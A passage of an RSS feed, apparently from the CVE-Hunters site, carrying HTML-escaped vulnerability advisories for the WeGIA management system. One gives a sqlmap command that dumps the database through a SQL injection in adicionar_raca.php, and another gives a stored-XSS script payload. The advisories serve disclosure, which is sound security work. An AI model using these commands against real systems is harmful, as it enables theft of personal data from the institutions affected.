&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 20 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23220</title>
        <link>https://www.cvehunters.com/p/cve-2025-23220/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23220/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23220-sql-injection-endpoint-adicionar_racaphp-parameter-raca&amp;#34;&amp;gt;CVE-2025-23220: SQL Injection endpoint &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23220&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23220&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the WeGIA application, specifically in the &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application&amp;#39;s database, highlighting the severity of the flaw.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_raca.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23220-sql-injection-endpoint-adicionar_racaphp-parameter-raca&amp;#34;&amp;gt;CVE-2025-23220: SQL Injection endpoint &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23220&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23220&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the WeGIA application, specifically in the &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application&amp;#39;s database, highlighting the severity of the flaw.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_raca.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not perform proper validation or sanitization on the id parameter, allowing an attacker to manipulate SQL queries directly. This flaw makes it possible to execute malicious statements in the database. During testing, the extraction of sensitive data through the exploit was confirmed.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload-sqlmap&amp;#34;&amp;gt;Payload (sqlmap):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -u &amp;amp;#34;http://localhost/dao/pet/adicionar_raca.php&amp;amp;#34; --data=&amp;amp;#34;raca=raca&amp;amp;#34; --dbms=mysql --cookie=&amp;amp;#34;PHPSESSID=thaicee00su2lhvlceu9r9v66v&amp;amp;#34; --dump
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23220/403879198-d621a4fb-e0ce-4b07-9262-754eb83033d0.png&amp;#34;
	width=&amp;#34;1341&amp;#34;
	height=&amp;#34;188&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23220/403879198-d621a4fb-e0ce-4b07-9262-754eb83033d0_hu_a20b829ddc5e955f.png 480w, /p/cve-2025-23220/403879198-d621a4fb-e0ce-4b07-9262-754eb83033d0_hu_f0fd8f9980cab109.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;713&amp;#34;
		data-flex-basis=&amp;#34;1711px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;It was possible to identify the database &amp;lt;code&amp;gt;wegia&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23220/403879383-742204fd-b886-4242-aaa6-743af3706284.png&amp;#34;
	width=&amp;#34;1345&amp;#34;
	height=&amp;#34;180&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23220/403879383-742204fd-b886-4242-aaa6-743af3706284_hu_3eb2ecb5d27ad788.png 480w, /p/cve-2025-23220/403879383-742204fd-b886-4242-aaa6-743af3706284_hu_e95b08231d82e0ee.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;747&amp;#34;
		data-flex-basis=&amp;#34;1793px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;It was possible to fully dump the &amp;lt;code&amp;gt;pessoa&amp;lt;/code&amp;gt; table.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23220/403879461-c1de0984-c0a3-4a80-930f-dd686067be9b.png&amp;#34;
	width=&amp;#34;1347&amp;#34;
	height=&amp;#34;126&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23220/403879461-c1de0984-c0a3-4a80-930f-dd686067be9b_hu_44347e579bef36ca.png 480w, /p/cve-2025-23220/403879461-c1de0984-c0a3-4a80-930f-dd686067be9b_hu_6833eead79fc2641.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;1069&amp;#34;
		data-flex-basis=&amp;#34;2565px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage: Exposing customer data or business information can significantly harm the organization&amp;#39;s image.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-425j-h4cf-g52j&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-425j-h4cf-g52j&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 20 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-57030</title>
        <link>https://www.cvehunters.com/p/cve-2024-57030/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-57030/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-57030-cross-site-scripting-xss-stored-in-documentos_funcionariophp-parameter-id&amp;#34;&amp;gt;CVE-2024-57030: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;documentos_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57030&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57030&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-57030-cross-site-scripting-xss-stored-in-documentos_funcionariophp-parameter-id&amp;#34;&amp;gt;CVE-2024-57030: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;documentos_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57030&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57030&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;To reproduce the issue, insert the following payloads into the vulnerable field of the URL and save the changes:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After saving the input, the injected script will be stored on the server and automatically executed for any user accessing the &amp;lt;code&amp;gt;html/geral/documentos_funcionario.php&amp;lt;/code&amp;gt;, confirming the stored XSS.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;File: &amp;lt;code&amp;gt;documentos_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Payload:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Trigger in: &amp;lt;code&amp;gt;html/geral/documentos_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Endpoint: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57030/image.png&amp;#34;
	width=&amp;#34;1258&amp;#34;
	height=&amp;#34;705&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57030/image_hu_5cec27c52b3418d1.png 480w, /p/cve-2024-57030/image_hu_fb5108c189509bce.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;178&amp;#34;
		data-flex-basis=&amp;#34;428px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57030/image-1.png&amp;#34;
	width=&amp;#34;1283&amp;#34;
	height=&amp;#34;724&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57030/image-1_hu_9eea4f05d8b0505c.png 480w, /p/cve-2024-57030/image-1_hu_2c1659751a161b62.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;177&amp;#34;
		data-flex-basis=&amp;#34;425px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;references&amp;#34;&amp;gt;References
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/issues/815&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/815&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/nilsonmori/WeGIA&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonmori/WeGIA&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
